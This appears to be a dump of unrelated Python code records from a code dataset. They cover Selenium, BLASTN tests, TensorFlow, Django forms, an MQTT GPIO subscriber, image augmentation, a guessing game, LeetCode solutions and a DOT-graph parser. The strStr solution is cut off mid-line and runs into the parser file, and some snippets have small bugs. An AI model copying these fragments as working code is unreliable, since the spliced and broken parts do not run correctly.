webdriver.Chrome(options=options)\n\n\ndriver.get(\"https://docs.google.com/presentation/d/1n2TEPRiaRajUODFNNbNQCfKIwnSViLia8G9PWSlMAow/export/pptx\")\ntime.sleep(1)\ndriver.quit()\n","sub_path":"python/change_download_folder_chrome.py","file_name":"change_download_folder_chrome.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"621539814","text":"import pytest\nfrom unittest import mock\nfrom lca._prog import _blastn as blastn\n\n@mock.patch(\"lca._prog._blastn.shutil\")\n@mock.patch(\"lca._prog._blastn.subprocess\")\ndef test_run_blastn_raises_exception_when_blastn_called_with_help(mock_shutil,\n mock_subprocess):\n mock_shutil.which.return_value = \"not None\"\n with pytest.raises(blastn.BLASTNError):\n blastn._blastn_cmd([\"-help\"])\n\n@mock.patch(\"lca._prog._blastn.shutil\")\n@mock.patch(\"lca._prog._blastn.subprocess\")\ndef test_run_blastn_raises_exception_when_blastn_called_with_h(mock_shutil,\n mock_subprocess):\n mock_shutil.which.return_value = \"not None\"\n with pytest.raises(blastn.BLASTNError):\n blastn._blastn_cmd([\"-h\"])\n\n@mock.patch(\"lca._prog._blastn.shutil\")\ndef test_check_for_blastn_binary_looks_for_correct_name(mock_shutil):\n blastn._check_for_blastn_binary()\n mock_shutil.which.assert_called_with(\"blastn\")\n\n@mock.patch(\"lca._prog._blastn.shutil\")\ndef test_check_for_blastn_binary_raises_exception_if_blastn_binary_not_found(mock_shutil):\n mock_shutil.which.return_value = None\n with pytest.raises(blastn.BLASTNError):\n blastn._check_for_blastn_binary()\n\n@mock.patch(\"lca._prog._blastn.subprocess\")\ndef test_blastn_cmd_raises_exception_when_subprocess_retcode_is_1(mock_subprocess):\n mock_subprocess.run.return_value.returncode = 1\n with pytest.raises(blastn.BLASTNError):\n blastn._blastn_cmd([\"this is a test\"])\n\n@pytest.mark.parametrize(\"test_input\", [1, 1.1, b\"this is bytes\"])\ndef test_parse_stdout_raises_exception_when_input_not_string(test_input):\n with pytest.raises(TypeError):\n blastn._parse_stdout(test_input)\n\ndef test_get_header_raises_exception_with_unrecognized_column():\n with pytest.raises(blastn.BLASTNError):\n blastn._get_header(\"6 this_is_an_illegal_column_name\")\n\ndef test_check_outfmt_raises_exception_with_illegal_outfmt():\n with pytest.raises(blastn.BLASTNError):\n blastn._check_outfmt(\"101\")\n","sub_path":"test/test_blastn.py","file_name":"test_blastn.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"224986303","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import *\n\n\ndef load_pretrained_model(model, hidden1=256, hidden2=256):\n \n pretrained_model = tf.keras.models.load_model(model)\n pretrained_model.trainable = True \n\n h1 = tf.keras.layers.Dense(hidden1, activation='elu', name='dense_ft_1')(pretrained_model.layers[-2].output)\n h1 = tf.keras.layers.Dropout(0.50)(h1)\n h2 = tf.keras.layers.Dense(hidden2, activation='elu', name='dense_ft_2')(h1)\n h2 = tf.keras.layers.Dropout(0.50)(h2)\n output = tf.keras.layers.Dense(1, activation='sigmoid', name='output')(h2)\n \n # define new model\n new_model = tf.keras.models.Model(inputs=pretrained_model.inputs, outputs=output)\n\n # Learning rate of 5e-5 used for finetuning based on hyperparameter evaluations\n ft_optimizer = tf.keras.optimizers.Adam(learning_rate=0.00005) \n \n # Compile model with Cross Entropy loss\n 
new_model.compile(loss=tf.keras.losses.BinaryCrossentropy(),\n optimizer=ft_optimizer,\n metrics=params.METRICS)\n\n return new_model\n\n\n\n\n","sub_path":"src/models/model_helper.py","file_name":"model_helper.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233095811","text":"from PIL import Image\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport math\n\nimport torch\nfrom torchvision import transforms\n\nclass DataTransform():\n def __init__(self, resize, mean, std):\n self.img_transform = transforms.Compose([\n transforms.Resize(resize),\n transforms.CenterCrop(resize),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n\n def __call__(self, img_path_list, acc_numpy, phase):\n img_tensor_list = self.transformImages(img_path_list)\n acc_numpy = acc_numpy.astype(np.float32)\n acc_numpy = acc_numpy / np.linalg.norm(acc_numpy)\n acc_tensor = torch.from_numpy(acc_numpy)\n return img_tensor_list, acc_tensor\n\n def transformImages(self, img_path_list):\n img_tensor_list = []\n for i in range(len(img_path_list)):\n img_tensor = self.img_transform(Image.open(img_path_list[i]))\n img_tensor_list.append(img_tensor)\n return img_tensor_list\n\n##### test #####\n# ## trans param\n# resize = 224\n# mean = ([0.5, 0.5, 0.5])\n# std = ([0.5, 0.5, 0.5])\n# ## image\n# img_path_list = [\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_0.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_72.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_144.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_216.jpg\",\n# \"../../../dataset_image_to_gravity/AirSim/5cam/example/camera_288.jpg\"\n# ]\n# ## label\n# acc_list = [0, 0, 1]\n# acc_numpy = np.array(acc_list)\n# ## transform\n# data_transform = DataTransform(resize, mean, std)\n# img_trans_list, acc_trans = data_transform(img_path_list, acc_numpy)\n# print(\"acc_trans = \", acc_trans)\n# ## tensor -> numpy\n# img_trans_numpy_list = [np.clip(img_trans.numpy().transpose((1, 2, 0)), 0, 1) for img_trans in img_trans_list] #(rgb, h, w) -> (h, w, rgb)\n# print(\"np.array(img_trans_numpy_list).shape = \", np.array(img_trans_numpy_list).shape)\n# ## imshow\n# for i in range(len(img_path_list)):\n# plt.subplot2grid((2, len(img_path_list)), (0, i))\n# plt.imshow(Image.open(img_path_list[i]))\n# plt.subplot2grid((2, len(img_path_list)), (1, i))\n# plt.imshow(img_trans_numpy_list[i])\n# plt.show()\n","sub_path":"pysrc/common_multi/data_transform_model.py","file_name":"data_transform_model.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"106065802","text":"#!/usr/bin/python\n\nimport os\npetsc_hash_pkgs=os.path.join(os.getenv('HOME'),'petsc-hash-pkgs')\n\nif __name__ == '__main__':\n import sys\n import os\n sys.path.insert(0, os.path.abspath('config'))\n import configure\n configure_options = [\n '--package-prefix-hash='+petsc_hash_pkgs,\n '--with-mpi=0',\n '--with-cc=gcc',\n '--with-cxx=g++',\n '--with-fc=gfortran',\n '--with-cuda=1',\n '--download-hdf5',\n '--download-metis',\n '--download-superlu',\n '--download-mumps',\n '--with-mumps-serial',\n '--with-shared-libraries=1',\n ]\n 
configure.petsc_configure(configure_options)\n\n","sub_path":"config/examples/arch-ci-linux-cuda-uni-pkgs.py","file_name":"arch-ci-linux-cuda-uni-pkgs.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"146212514","text":"from django import forms\nfrom django.forms import ModelForm\nfrom surveys.models import Question,Survey,Response,AnswerText,AnswerRadio,AnswerSelect,AnswerInteger,AnswerSelectMultiple,QuestionSet,Page\n\nclass ResponseForm(ModelForm):\n class Meta:\n model = Response\n #fields = ('interviewer', 'interviewee', 'conditions', 'comments')\n fields = ()\n def __init__(self, *args, **kwargs):\n page = kwargs.pop('page')\n survey = kwargs.pop('survey')\n user = kwargs.pop('user')\n self.page = page\n self.survey = survey\n self.user = user\n super(ResponseForm, self).__init__(*args, **kwargs)\n self.prefix = \"question\"\n\n data = kwargs.get('data')\n for q in page.questions.question_set.all():\n question = \"%s_%d\" % (self.prefix, q.pk)\n\n if q.question_type == Question.TEXT:\n form = forms.CharField(label=q.text, widget=forms.TextInput)\n elif q.question_type == Question.RADIO:\n question_choices = q.get_choices()\n form = forms.ChoiceField(label=q.text, widget=forms.RadioSelect, choices=question_choices)\n elif q.question_type == Question.SELECT:\n question_choices = q.get_choices()\n question_choices = tuple([('', '---------------')]) + question_choices\n form = forms.ChoiceField(label=q.text, widget=forms.Select, choices=question_choices)\n elif q.question_type == Question.SELECT_MULTIPLE:\n question_choices = q.get_choices()\n form = forms.MultipleChoiceField(label=q.text, widget=forms.CheckboxSelectMultiple, choices=question_choices)\n elif q.question_type == Question.INTEGER:\n form = forms.IntegerField(label=q.text)\n\n self.fields[question] = form\n\n if q.required:\n self.fields[question].required = True\n self.fields[question].widget.attrs[\"class\"] = \"required\"\n else:\n self.fields[question].required = False\n \n if data:\n self.fields[question].initial = data.get(question)\n def save(self,commit=True):\n response = super(ResponseForm, self).save(commit=False)\n response.page = self.page\n response.user = self.user\n response.save()\n\n for field_name,field_value in self.cleaned_data.items():\n if field_name.startswith(self.prefix):\n q_id = int(field_name.split(\"_\")[1])\n q = Question.objects.get(pk=q_id)\n if q.question_type == Question.TEXT:\n a = AnswerText(question = q)\n elif q.question_type == Question.RADIO:\n a = AnswerRadio(question = q)\n elif q.question_type == Question.SELECT:\n a = AnswerSelect(question = q)\n elif q.question_type == Question.SELECT_MULTIPLE:\n a = AnswerSelectMultiple(question = q)\n elif q.question_type == Question.INTEGER:\n a = AnswerInteger(question = q)\n a.body = field_value\n\n a.response = response\n a.save()\n return response\n\n","sub_path":"surveys/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"631024967","text":"import paho.mqtt.client as mqtt\nimport RPi.GPIO as GPIO\n\nMQTT_HOST = \"test.mosquitto.org\"\nMQTT_PORT = 1883\nMQTT_KEEPALIVE_INTERVAL = 60\nMQTT_TOPIC = \"gapple\"\n\nled_pin = 18 \n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(led_pin, GPIO.OUT)\n\ndef on_message(client, userdata, message):\n result = str(message.payload.decode(\"utf-8\"))\n print(\"received 
message = \", str(message.payload.decode(\"utf-8\")))\n \n if(result.upper() == \"ON\"):\n GPIO.output(led_pin,True)\n elif(result.upper() == \"OFF\"):\n GPIO.output(led_pin,False)\n else:\n print(\"Illegal Arugment Exception!\");\n \n\n# Initiate MQTT Client\nclient = mqtt.Client()\n\n# Register received message callback function\nclient.on_message = on_message\n\n# Connect with MQTT Broker\n# client.username_pw_set(\"\", \"\")\nclient.connect(MQTT_HOST, MQTT_PORT, MQTT_KEEPALIVE_INTERVAL)\n\nclient.subscribe(MQTT_TOPIC)\n\n# Loop from MQTT_Broker\nclient.loop_forever()\n","sub_path":"exercise/mqtt/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"48807112","text":"from rest_framework import serializers, fields\nfrom events import models\nfrom users import (\n serializers as user_serializers,\n models as user_models\n)\n\n\nclass CampusSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.Campus\n fields = ('id', 'name', 'description')\n read_only_fields = ('id', 'name', 'description')\n\n\nclass EventLocationSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventLocation\n fields = ('id', 'name', 'description', 'is_public', 'created_at', 'campus')\n read_only_fields = ('id', 'created_at', 'modified_at', 'is_public')\n\n def to_representation(self, instance):\n data = super(EventLocationSerializer, self).to_representation(instance)\n if instance.campus:\n data['campus'] = CampusSerializer(instance=instance.campus).data\n return data\n\n def save(self, **kwargs):\n self._validated_data.update({\n 'user_id': kwargs.pop('user_id')\n })\n return super(EventLocationSerializer, self).save(**kwargs)\n\n\nclass EventShoppingItemSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventShoppingItem\n fields = ('id', 'name', 'created_at', 'event', 'user_id', 'amount')\n read_only_fields = ('id', 'created_at', 'modified_at')\n\n def to_representation(self, instance):\n data = super(EventShoppingItemSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id if instance.user_id else None\n data['bringer'] = instance.bringer_id if instance.bringer_id else None\n data.pop('user_id')\n return data\n\n\nclass EventShoppingItemBringSerializer(serializers.Serializer):\n bring = fields.BooleanField(required=True)\n\n def save(self, **kwargs):\n item_obj = kwargs.pop('item_obj')\n user_id = kwargs.pop('user_id')\n if self.validated_data.get('bring'):\n # add bringer_id to shopping item object\n item_obj.bringer_id = user_id\n else:\n # remove bringer_id to shopping item object\n item_obj.bringer_id = \"\"\n item_obj.save()\n return item_obj\n\n\nclass EventMealSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventMeal\n fields = ('id', 'name', 'created_at', 'event', 'meal_id', 'user_id')\n read_only_fields = ('id', 'created_at', 'modified_at')\n\n def to_representation(self, instance):\n data = super(EventMealSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id\n data['voters'] = instance.votes.values_list('user_id', flat=True)\n data['votes'] = len(data['voters'])\n data.pop('user_id')\n return data\n\n\nclass EventMealVoteSerializer(serializers.Serializer):\n vote = fields.BooleanField(required=True)\n\n def save(self, **kwargs):\n meal_obj = kwargs.pop('meal_obj')\n user_id = kwargs.pop('user_id')\n if 
self.validated_data.get('vote'):\n # Create Vote\n meal_obj.votes.create(user_id=user_id)\n else:\n # Delete Vote\n meal_obj.votes.filter(user_id=user_id).delete()\n return meal_obj\n\n\nclass EventMessageSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventMessage\n fields = ('id', 'text', 'user_id', 'event', 'created_at')\n read_only_fields = ('id', 'created_at', 'modified_at')\n\n def to_representation(self, instance):\n data = super(EventMessageSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id\n data.pop('user_id')\n return data\n\n\nclass EventPreferenceSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.EventPreference\n fields = ('event', 'food_preference')\n\n def to_representation(self, instance):\n return user_serializers.FoodPreferenceSerializer(instance=instance.food_preference).data\n\n\nclass EventUserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.EventUser\n fields = ('event', 'user_id')\n\n def to_representation(self, instance):\n \"\"\"\n :param instance: EventUser instance\n :return: UserSerializer data\n \"\"\"\n return user_serializers.UserSerializer(instance=instance.user_id).data\n\n\nclass EventSerializer(serializers.ModelSerializer):\n preferenceids = fields.MultipleChoiceField(\n choices=user_models.FoodPreference.objects.all().values_list('pk', flat=True),\n allow_null=True,\n required=False,\n help_text=\"Food Preference IDs to save with event while creation\"\n )\n\n class Meta:\n model = models.Event\n fields = ('id', 'title', 'description', 'start_at', 'end_at', 'created_at', 'capacity', 'user_id', 'location',\n 'preferenceids')\n read_only_fields = ('id', 'created_at', 'user_id')\n\n def to_representation(self, instance):\n data = super(EventSerializer, self).to_representation(instance)\n data['creator'] = instance.user_id\n data.pop('user_id')\n if self.context.get('is_list', False):\n data['num_members'] = instance.users.count()\n data['members'] = []\n data['shoppingitems'] = []\n data['meals'] = []\n data['messages'] = []\n else:\n data['members'] = instance.users.all().values_list('user_id', flat=True)\n data['num_members'] = len(data['members'])\n data['shoppingitems'] = EventShoppingItemSerializer(instance=instance.shop_items.all(), many=True).data\n data['meals'] = EventMealSerializer(instance=instance.meals.all(), many=True).data\n data['messages'] = EventMessageSerializer(instance=instance.messages.all(), many=True).data\n\n data['preferences'] = EventPreferenceSerializer(\n instance=instance.preferences.all(),\n many=True\n ).data\n data['location'] = EventLocationSerializer(instance=instance.location).data\n return data\n\n def save(self, **kwargs):\n \"\"\"\n Create/Update Event Object.\n Then check is there are preferenceids.\n If yes, Delete old preferences. 
Create EventPreference objects\n \"\"\"\n self._validated_data.update({\n 'user_id': kwargs.pop('user_id')\n })\n preferenceids = self._validated_data.pop('preferenceids', [])\n event_obj = super(EventSerializer, self).save(**kwargs)\n if preferenceids:\n # Delete Old Preference objects\n models.EventPreference.objects.filter(event=event_obj).delete()\n # Create Event Preference objects\n data = [\n {\n \"event\": event_obj.id,\n \"food_preference\": pref_id\n } for pref_id in preferenceids\n ]\n pref_serializer = EventPreferenceSerializer(data=data, many=True)\n pref_serializer.is_valid(raise_exception=True)\n pref_serializer.save()\n\n return event_obj\n","sub_path":"events/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10957708","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 28 11:58:55 2019\n\n@author: Moha-Thinkpad\n\"\"\"\n\n## code for augmenting image + landmark locatios\n# based on skimage\n# and imgaug https://github.com/aleju/imgaug\n\n\nfrom skimage import io\nfrom numpy import genfromtxt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport imgaug as ia\nfrom imgaug import augmenters as iaa\nimport glob\nimport os\nfrom scipy import misc\n\n# image source directory\nSourcePath='./Sources'\n# image destination directory\nwrite_to_dir = \"./augmented\"\n\ntry:\n os.mkdir(write_to_dir)\nexcept:\n print('destination folder is already exist')\n\n\n\n# set your augmentation sequqnces here\n# in a list called AugCongigList \n \n \nAugCongigList=[ \n iaa.Sequential([iaa.Fliplr(1, name=\"Flipper\")\n ], name='first config, just flip')\n , \n iaa.Sequential([iaa.Fliplr(1, name=\"Flipper\"),\n iaa.Affine(scale={\"x\": 0.8, \"y\": 0.9}, \n translate_percent={\"x\": 0.2, \"y\": 0.1}, \n rotate= 45, name='affine 1')] , name='second config, sequential, flip + affine')\n ] \n\n\n\nfor filename in glob.glob(SourcePath+'/*.png'): #assuming png\n \n FileName=filename.replace(SourcePath,'')\n FileName=FileName[:len(FileName)-4]\n \n \n Image = io.imread(filename)\n \n \n \n Landmarks = genfromtxt(SourcePath+FileName+'.csv', delimiter=',') \n Landmarks = Landmarks.astype(int)\n Landmarks=Landmarks[1:] # remove the first row because it is just axis label \n \n #### visualization\n# plt.figure()\n# plt.imshow(Image)\n# plt.plot(Landmarks[0,1],Landmarks[0,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[1,1],Landmarks[1,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[2,1],Landmarks[2,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[3,1],Landmarks[3,0],marker=\"s\",color='red')\n# plt.plot(Landmarks[4,1],Landmarks[4,0],marker=\"s\",color='red')\n # The augmenters expect a list of imgaug.KeypointsOnImage.\n try:\n images=np.zeros(shape=[1,Image.shape[0],Image.shape[1],Image.shape[2]], dtype='uint8')\n images[0,:,:,:]=Image\n except:\n images=np.zeros(shape=[1,Image.shape[0],Image.shape[1]], dtype='uint8')\n images[0,:,:]=Image\n \n # Generate random keypoints.\n # The augmenters expect a list of imgaug.KeypointsOnImage.\n keypoints_on_images = []\n for image in images:\n keypoints = []\n for _ in range(len(Landmarks)):\n keypoints.append(ia.Keypoint(x=Landmarks[_,1], y=Landmarks[_,0]))\n keypoints_on_images.append(ia.KeypointsOnImage(keypoints, shape=image.shape))\n \n\n for ConfCounter in range(len(AugCongigList)):\n \n seq=AugCongigList[ConfCounter]\n \n seq_det = seq.to_deterministic() # call this for each batch again, 
NOT only once at the start\n \n # augment keypoints and images\n images_aug = seq_det.augment_images(images)\n transformed_keypoints = seq_det.augment_keypoints(keypoints_on_images)\n \n X_new=[]\n Y_new=[]\n # Example code to show each image and print the new keypoints coordinates\n for keypoints_after in transformed_keypoints:\n for kp_idx, keypoint in enumerate(keypoints_after.keypoints):\n x_new, y_new = keypoint.x, keypoint.y\n X_new.append(x_new)\n Y_new.append(y_new)\n \n newLandmarks=np.zeros(Landmarks.shape) \n newLandmarks[:,0]=np.asarray(Y_new)\n newLandmarks[:,1]=np.asarray(X_new)\n newLandmarks=newLandmarks.astype(int)\n\n# plt.figure()\n# plt.imshow(images_aug[0,:,:])\n# plt.plot(newLandmarks[0,1],newLandmarks[0,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[1,1],newLandmarks[1,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[2,1],newLandmarks[2,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[3,1],newLandmarks[3,0],marker=\"s\",color='red')\n# plt.plot(newLandmarks[4,1],newLandmarks[4,0],marker=\"s\",color='red')\n \n try:\n misc.imsave(write_to_dir+FileName+'_'+str(ConfCounter)+'_aug.png', images_aug[0,:,:,:])\n except:\n misc.imsave(write_to_dir+FileName+'_'+str(ConfCounter)+'_aug.png', images_aug[0,:,:])\n\n np.savetxt(write_to_dir+FileName+'_'+str(ConfCounter)+'_aug.csv', \n newLandmarks , delimiter=\",\", fmt='%i' , header='row,col')\n \n text_file = open(write_to_dir+FileName+'_'+str(ConfCounter)+'_info.txt', \"w\")\n text_file.write(\"Augmentation Info \" + '\\n' + 'name:' + seq.name + '\\n' +'\\%s' % seq)\n text_file.close()","sub_path":"PrMain_batch_images.py","file_name":"PrMain_batch_images.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"511626469","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url,include\nfrom payroll import views\nurlpatterns = [\n #url(r'fileupload/', views.FileUploadView,name='FileUploadView1'),\n #url(r'authenticate1/', views.authenticateuser1, name='authenticateuser1'),\n url(r'authenticate/', views.authenticateuser, name='authenticateuser'),\n url(r'^$', views.index, name='index'),\n url(r'comparision/', views.Comparision.as_view()),\n url(r'legacyempdata/', views.LegacyEmpData,name='LegacyEmpData'),\n url(r'newempdata/', views.NewEmpData, name='NewEmpData'),\n url(r'legacyemppaydata/', views.LegacyEmpPayData, name='LegacyEmpPayData'),\n url(r'newemppaydata/', views.NewEmpPayData, name='NewEmpPayData'),\n url(r'empmappingdata/', views.EmpMappingData, name='EmpMappingData'),\n url(r'legacyempcomponentmapping/', views.LegacyPayComponentMapping, name='LegacyPayComponentMapping'),\n url(r'newempcomponentmapping/', views.NewPayComponentMapping, name='NewPayComponentMapping'),\n\n\n\n]","sub_path":"payroll/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"586960221","text":"# Higher Lower\n# Program should work but will need to be usability tested\nimport random\n\n# Number checking function:\ndef int_check(question, low=None, high=None):\n\n # error messages\n if low is not None and high is not None:\n error = \"Please enter an integer between {} and {} \" \\\n \"(inclusive)\".format(low, high)\n elif low is not None and high is None:\n error = \"Please enter an integer that is more than or \" \\\n \"equal to {}\".format(low)\n elif low is None and 
high is not None:\n error = \"Please enter an integer that is less than or \" \\\n \"equal to {}\".format(high)\n\n else:\n error = \"Please enter an integer\"\n\n while True:\n\n try:\n response = int(input(question))\n\n # Checks response is not low\n if low is not None and response < low:\n print(error)\n continue\n\n # Checks response is not too high\n if high is not None and response > high:\n print(error)\n continue\n\n return response\n\n except ValueError:\n print(error)\n continue\n\n# Main routine\n\nlowest = int_check(\"Low Number: \")\nhighest = int_check(\"High Number: \", lowest + 1)\nrounds = int_check(\"Rounds: \", 1)\n# guess = int_check(\"Guess: \", lowest, highest)\n\n# Generate secret number between low and high\nLOW = lowest\nHIGH = highest\n\nfor item in range(LOW, HIGH):\n secret = random.randint(LOW, HIGH)\n\n# Compare user's guess with secret number\nSECRET = secret\nGUESSES_ALLOWED = 10\n\nalready_guessed = []\nguesses_left = GUESSES_ALLOWED\nnum_won = 0\n\nguess = \"\"\n\n# Start game\nwhile guess != SECRET and guesses_left >= 1:\n\n guess = int(input(\"Guess: \")) # replace this with function call later\n\n # checks that guess is not a duplicate\n if guess in already_guessed:\n print(\"You have already guessed that number. Please try again. \"\n \"You still have {} guesses left\".format(guesses_left))\n continue\n\n guesses_left -= 1\n already_guessed.append(guess)\n\n # if user has guesses left\n if guesses_left > 1:\n if guess > SECRET:\n print(\"Too high, try a lower number. Guesses left: {}\".format(guesses_left))\n\n elif guess < SECRET:\n print(\"Too low, try a higher number. Guesses left: {}\".format(guesses_left))\n\n # if user has one guess left\n elif guesses_left == 1:\n if guess > SECRET:\n print(\"Too high, try a lower number. THIS IS YOUR FINAL GUESS!\")\n\n elif guess < SECRET:\n print(\"Too low, try a higher number. THIS IS YOUR FINAL GUESS!\")\n\nif guess == SECRET:\n if guesses_left == GUESSES_ALLOWED - 1:\n print(\"Good job! You got the secret number in one guess :)\")\n else:\n print(\"Congratulations, you got it in {} guesses\".format(len(already_guessed)))\n num_won += 1\nelse:\n print(\"Sorry, you lost this round because you have run out of guesses :(\")","sub_path":"Higher_Lower_Game_v2.py","file_name":"Higher_Lower_Game_v2.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"12378921","text":"'''\nImplement strStr() .\n\nReturn the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n\nExample 1:\n\nInput: haystack = \"hello\", needle = \"ll\"\nOutput: 2\n\nExample 2:\n\nInput: haystack = \"aaaaa\", needle = \"bba\"\nOutput: -1\n\nClarification:\n\nWhat should we return when needle is an empty string? This is a great question to ask during an interview.\n\nFor the purpose of this problem, we will return 0 when needle is an empty string. 
This is consistent to C's strstr() and Java's indexOf() .\n'''\nimport time\nclass Solution():\n def __init__(self):\n self.haystack='afjlajldjncv,ndkhaljekjafnkeljelrjlndmn,mcnzkjhfaflkjajljiuieonaknjlkjhello'\n self.needle='ll'\n\n '''My approach'''\n def myFun(self):\n lenHay=len(self.haystack)\n lenNee=len(self.needle)\n for i in range(lenHay-lenNee+1):\n flag=1\n for j in range(lenNee):\n if self.needle[j]!=self.haystack[i+j]:\n flag=-1\n break\n if flag==1:\n return i\n return -1\n\n '''Reference solution 1'''\n def strStr(self):\n lenHay = len(self.haystack)\n lenNee = len(self.needle)\n if lenHay==lenNee:\n if self.haystack==self.needle:\n return 0\n else:\n return -1\n for i in range(lenHay):\n k=i\n j=0\n while(j None:\n \"\"\"\n @param dot_file: The path to the DOT file\n @return A list of networkx MultiGraphs containing the graphs in the DOT file\n \"\"\"\n if exists(dot_file):\n self._parse_dot_file(dot_file)\n else:\n self._graph = []\n logger.error(f\"File {dot_file} not found\")\n \n def _parse_dot_file(self, path: str) -> None:\n logger.info(f\"Parsing dot file {path}\")\n graph = read_dot(path)\n\n if len(graph.nodes) > 0:\n self._graph = [self._filter_graph(graph)]\n return\n \n # handle subgraphs\n pydot_graph = graph_from_dot_file(path)\n self._graph = []\n for p in pydot_graph:\n for subgraph in p.get_subgraphs():\n graph = from_pydot(subgraph)\n self._graph.append(self._filter_graph_gcc(graph))\n \n def _filter_graph_gcc(self, graph: networkx.MultiGraph) -> networkx.MultiGraph:\n logger.debug(\"Filtering graph\")\n\n duplicate_nodes = [n for n in graph.nodes if n.endswith(':s') or n.endswith(':n')]\n for x in duplicate_nodes:\n in_edges = list(graph.in_edges(x))\n out_edges = list(graph.out_edges(x))\n actual_node = x.split(':')[0]\n for src, dst in in_edges:\n graph.add_edge(src, actual_node)\n graph.remove_edge(src, x)\n for src, dst in out_edges:\n graph.add_edge(actual_node, dst)\n graph.remove_edge(src, dst)\n graph.remove_node(x)\n\n flag = False\n for (u,v,_) in graph.edges:\n if 'label' in graph.nodes[u] and graph.nodes[u]['label'].strip(\"'\").strip('\"') == 'ENTRY':\n if 'label' in graph.nodes[v] and graph.nodes[v]['label'].strip(\"'\").strip('\"') == 'EXIT':\n flag = True\n break\n \n if flag is True:\n graph.remove_edge(u,v)\n \n return graph\n \n def _filter_graph(self, graph: networkx.MultiGraph) -> networkx.MultiGraph:\n \"\"\"\n Filter the graph by merging duplicate blocks with the original\n \"\"\"\n logger.debug(\"Filtering graph\")\n # Roots are identified by 0 incoming edges\n possible_roots = [n for n,d in graph.in_degree() if d == 0 ]\n possible_exits = [n for n,d in graph.out_degree() if d == 0 ]\n\n # Duplicate nodes also have 0 incoming edges\n # However, duplicate nodes do not have any instructions\n duplicate_nodes = [n for n in possible_roots if len(graph.nodes[n]) == 0 ]\n\n # Duplicates are identified by following the naming pattern {original}:s[0-9]\n duplicate_node_map = {}\n for tmp in 
set(possible_exits)-set(duplicate_nodes):\n duplicate_node_map[tmp] = [n for n in duplicate_nodes if n.startswith(tmp) and n[len(tmp)] == ':' ]\n \n for tmp in duplicate_node_map:\n for duplicate_node in duplicate_node_map[tmp]:\n in_edges = list(graph.in_edges(duplicate_node))\n for src, dst in in_edges:\n graph.add_edge(src, tmp)\n graph.remove_edge(src, dst)\n graph.remove_node(duplicate_node)\n \n flag = False\n for (u,v,_) in graph.edges:\n if 'label' in graph.nodes[u] and graph.nodes[u]['label'].strip(\"'\").strip('\"') == 'ENTRY':\n if 'label' in graph.nodes[v] and graph.nodes[v]['label'].strip(\"'\").strip('\"') == 'EXIT':\n flag = True\n break\n \n if flag is True:\n graph.remove_edge(u,v)\n \n return graph\n \n @property\n def graph(self) -> List[networkx.MultiGraph]:\n return self._graph\n\n @staticmethod\n def get_roots(graph) -> List[str]:\n return [n for n,d in graph.in_degree() if d == 0 ]","sub_path":"bifrost/dot_parser.py","file_name":"dot_parser.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"313615531","text":"class Solution:\n def findContentChildren(self, g, s):\n g.sort()\n s.sort()\n res = 0\n i = 0\n j = 0\n while i < len(g) and j < len(s):\n if g[i] > s[j]:\n j += 1\n continue\n res += 1\n i += 1\n j += 1\n return res\n\nif __name__ == '__main__':\n sol = Solution()\n \n g = [1, 2]\n s = [1, 2, 3]\n r = sol.findContentChildren(g, s)\n 